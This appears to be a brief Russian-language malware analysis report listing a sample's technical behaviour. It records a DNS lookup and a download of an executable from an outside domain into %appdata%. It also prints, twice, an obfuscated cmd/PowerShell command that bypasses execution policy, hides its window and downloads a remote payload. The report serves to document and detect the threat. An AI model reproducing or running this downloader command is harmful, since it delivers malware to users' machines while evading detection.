Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWErs^he^L^l.e^x^e^ -e^XeCU^TIO^nPOl^IcY bY^p^ASs^ ^-NoPRo^FiL^E^ ^-wIN^dO^wstYl^e^ HIdden (n^Ew-oB^J^ECT^ SySte^m^.NET.weBcL^IENt^).^DOWNLoA^dFI^lE('http://flowers-my.wang/search...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "P^oWErs^he^L^l.e^x^e^ -e^XeCU^TIO^nPOl^IcY bY^p^ASs^ ^-NoPRo^FiL^E^ ^-wIN^dO^wstYl^e^ HIdden (n^Ew-oB^J^ECT^ SySte^m^.NET.weBcL^IENt^).^DOWNLoA^dFI^lE('http://flowers-my.wang/search...' (со скрытым окном)